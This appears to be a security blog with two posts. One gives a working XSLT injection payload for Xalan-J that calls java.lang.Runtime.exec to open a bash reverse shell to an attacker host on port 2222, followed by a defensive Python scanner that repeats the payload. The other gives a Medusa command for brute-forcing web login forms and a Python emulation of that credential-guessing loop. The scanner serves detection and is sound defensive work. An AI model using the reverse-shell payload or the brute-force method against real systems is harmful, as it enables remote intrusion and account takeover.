11/01/13

XSLT OS command execution (reverse shell)


XSLT code injection

Xalan-J lets a stylesheet bind a namespace prefix to a single Java class (xalan://java.lang.Runtime) or reach any class by fully-qualified name through the http://xml.apache.org/xalan/java namespace. If an application applies attacker-controlled XSLT with these extensions enabled, the stylesheet below runs /bin/bash -c with a reverse shell to <attackerIP>:2222. It produces no output at all; the only effect is the side effect of runtime:exec.

<!-- runtime: is bound to java.lang.Runtime; j: can name any class (j:java.lang.String.new) -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:j="http://xml.apache.org/xalan/java" xmlns:runtime="xalan://java.lang.Runtime" version="1.0">
<xsl:output method="text"/>
<xsl:strip-space elements="*"/>
<!-- static call: java.lang.Runtime.getRuntime() -->
<xsl:variable name="rt" select="runtime:getRuntime()"/>
<xsl:variable name="unix_shell" select="'/bin/bash'"/>
<xsl:variable name="unix_option" select="'-c'"/>
<!-- bash reverse shell over /dev/tcp; replace <attackerIP> with the listener address (port 2222) -->
<xsl:variable name="command" select="'0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/<attackerIP>/2222; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196'"/>
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<!-- join shell, option and command with a separator that cannot appear in the command -->
<xsl:variable name="tmp">
<xsl:value-of select="concat($unix_shell, $separator, $unix_option, $separator, $command)"/>
</xsl:variable>
<!-- String.split() on the separator yields the String[] argv that Runtime.exec(String[]) expects;
     exec(String) would re-tokenize the command on whitespace and break it -->
<xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<!-- instance call: rt.exec(array) spawns /bin/bash -c '...' -->
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>
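The defensive counterpart of the payload above is a check that an application can run before handing user-supplied XSLT to Xalan-J: refuse any stylesheet that declares a Java extension namespace (xalan://... or http://xml.apache.org/xalan/java) or calls a function through one. The following scanner is an added example written for this post, not code from the blog or from Xalan; the sample stylesheet is the payload above with the documentation address 192.0.2.10 standing in for <attackerIP>, and the benign stylesheet is constructed for contrast.

```python
import io
import re
import xml.etree.ElementTree as ET

# Namespace URIs through which Xalan-J hands a stylesheet arbitrary Java classes.
XALAN_JAVA_NS = "http://xml.apache.org/xalan/java"   # any class: j:java.lang.String.new(...)
XALAN_CLASS_SCHEME = "xalan://"                        # one class bound per prefix

# A prefixed XPath function call such as runtime:exec($rt, $array) or j:java.lang.String.new($tmp).
_CALL_RE = re.compile(r"\b([A-Za-z_][\w.-]*):([A-Za-z_][\w.-]*)\s*\(")


def is_java_extension_uri(uri):
    return uri == XALAN_JAVA_NS or uri.startswith(XALAN_CLASS_SCHEME)


def find_java_extension_use(xslt_text):
    """Return (kind, detail) findings in document order: 'namespace' for every
    Java-extension prefix declared anywhere, 'call' for every attribute
    expression that invokes a function through one of those prefixes.
    Prefix re-binding in nested scopes is ignored on purpose (conservative)."""
    findings = []
    java_prefixes = {}
    source = io.BytesIO(xslt_text.encode("utf-8"))
    for event, payload in ET.iterparse(source, events=("start-ns", "start")):
        if event == "start-ns":
            prefix, uri = payload
            if is_java_extension_uri(uri):
                java_prefixes[prefix] = uri
                findings.append(("namespace", f'xmlns:{prefix}="{uri}"'))
            continue
        elem = payload
        for attr, value in elem.attrib.items():
            for m in _CALL_RE.finditer(value):
                prefix, func = m.group(1), m.group(2)
                if prefix in java_prefixes:
                    findings.append(("call", f"{prefix}:{func}() in @{attr}"))
    return findings


def is_safe_stylesheet(xslt_text):
    """True only if the stylesheet neither declares nor uses a Java extension namespace."""
    return not find_java_extension_use(xslt_text)


# Constructed sample: the post's payload, 192.0.2.10 standing in for <attackerIP>.
REVERSE_SHELL_XSLT = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:j="http://xml.apache.org/xalan/java" xmlns:runtime="xalan://java.lang.Runtime" version="1.0">
<xsl:output method="text"/>
<xsl:variable name="rt" select="runtime:getRuntime()"/>
<xsl:variable name="command" select="'0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/192.0.2.10/2222; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196'"/>
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<xsl:variable name="tmp" select="concat('/bin/bash', $separator, '-c', $separator, $command)"/>
<xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>"""

# Constructed benign stylesheet: plain XSLT 1.0, no extension namespaces.
BENIGN_XSLT = """<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="text"/>
<xsl:template match="/"><xsl:value-of select="concat('root: ', name(/*))"/></xsl:template>
</xsl:stylesheet>"""


if __name__ == "__main__":
    for kind, detail in find_java_extension_use(REVERSE_SHELL_XSLT):
        print(f"{kind:9s} {detail}")
    print("benign stylesheet safe:", is_safe_stylesheet(BENIGN_XSLT))
```

The scan is deliberately textual: it flags the namespace declaration itself, so a stylesheet that declares xalan://java.lang.Runtime but hides the call in a later xsl:include is still rejected, and it does not try to be an XPath parser. It complements, rather than replaces, disabling extension functions in the transformer configuration.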

References:
http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Engine_XalanJ

26/04/12

BruteForce with Medusa: web-form

An excellent alternative to THC-HYDRA: Medusa

To brute-force a web login form (the web-form module fills the empty user= and pass= fields with each candidate pair and treats any response that does not contain the DENY-SIGNAL text as a successful login):
#./medusa -h [IP|host] -U users_file -P file_password.txt \
  -M web-form -m FORM:"path/page.php" -m DENY-SIGNAL:"text shown on a failed login" \
  -m FORM-DATA:"[post|get]?user=&pass=&login=login"

The following command lists the available modules, which are selected with the "-M" option:
#./medusa -d
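To make the FORM-DATA and DENY-SIGNAL semantics concrete, here is a small Python emulation of what the web-form module does for each candidate pair. It is an added example written for this post, not Medusa's code: it assumes the convention that the first two empty fields in FORM-DATA receive the username and the password, and it submits to a constructed in-process stand-in for path/page.php instead of a real server, so it runs offline.

```python
import itertools
from urllib.parse import parse_qsl, urlencode


def parse_form_data(spec):
    """Parse a Medusa-style FORM-DATA spec such as "post?user=&pass=&login=login".
    Returns (method, fields, user_field, pass_field). Assumption: the first two
    fields with empty values are the username and password fields."""
    method, _, query = spec.partition("?")
    method = method.upper()
    if method not in ("POST", "GET"):
        raise ValueError("FORM-DATA method must be post or get")
    fields = parse_qsl(query, keep_blank_values=True)
    blanks = [name for name, value in fields if value == ""]
    if len(blanks) < 2:
        raise ValueError("FORM-DATA needs two empty fields (user, pass)")
    return method, fields, blanks[0], blanks[1]


def build_request(spec, username, password):
    """Fill the user and pass fields and return (method, urlencoded body/query)."""
    method, fields, user_field, pass_field = parse_form_data(spec)
    filled = []
    for name, value in fields:
        if name == user_field:
            value = username
        elif name == pass_field:
            value = password
        filled.append((name, value))
    return method, urlencode(filled)


def brute_force(spec, users, passwords, submit, deny_signal):
    """Try every user/password pair through submit(method, body) -> response text.
    As with Medusa's DENY-SIGNAL, a response that lacks the deny text counts as a hit,
    so a deny string that is too generic (or missing) yields false positives."""
    hits = []
    for user, password in itertools.product(users, passwords):
        method, body = build_request(spec, user, password)
        response = submit(method, body)
        if deny_signal not in response:
            hits.append((user, password))
    return hits


def fake_login_page(method, body):
    """Constructed stand-in for path/page.php: one valid account, deny text otherwise."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    if method == "POST" and params.get("user") == "admin" and params.get("pass") == "letmein":
        return "<html><body>Welcome, admin</body></html>"
    return "<html><body>Login failed: invalid credentials</body></html>"


# Constructed wordlists standing in for users_file and file_password.txt.
USERS = ["root", "admin", "test"]
PASSWORDS = ["123456", "password", "letmein"]

if __name__ == "__main__":
    found = brute_force("post?user=&pass=&login=login", USERS, PASSWORDS,
                        fake_login_page, "Login failed")
    print("valid credentials:", found)
```

The DENY-SIGNAL branch is the part worth testing against the real target first: submit one known-bad pair by hand, copy a string that appears only in the failure page, and only then start the run.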